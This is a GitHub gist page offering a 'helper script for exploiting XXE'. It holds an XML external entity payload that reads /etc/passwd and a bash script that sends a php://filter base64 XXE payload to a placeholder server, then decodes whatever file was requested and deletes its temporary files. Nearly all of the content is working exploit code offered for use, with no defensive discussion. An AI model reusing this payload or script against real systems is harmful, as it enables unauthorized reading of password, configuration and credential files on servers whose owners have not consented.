AvasDream/XML-external-entity-script.md

Last active July 7, 2018 10:27

Star () You must be signed in to star a gist
Fork () You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/AvasDream/81fc950169bc2b9608e7759ac42373f0.js"></script>
Save AvasDream/81fc950169bc2b9608e7759ac42373f0 to your computer and use it in GitHub Desktop.

Download ZIP

Helper Script for exploiting xxe

Raw

XML-external-entity-script.md

Basics

Source

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds>
    <user>&xxe;</user>
    <pass>mypass</pass>
</creds>

Base64 "encoded" traffic

#!/bin/bash
echo "<?xml version=\"1.0\"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM \"php://filter/read=convert.base64-encode/resource=$1\" >]>
<details>
<subnet_mask>&xxe;</subnet_mask>
<test></test>
</details>
" > tmp.txt
curl -s -d @tmp.txt -X POST http://x.x.x.x/x.php > out.txt
echo $(cat out.txt | cut -d" " -f 7) > out1.txt
cat out1.txt | tr -d " \t\n\r" > out2.txt

base64 --decode out2.txt

rm tmp.txt

rm ou*.txt

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment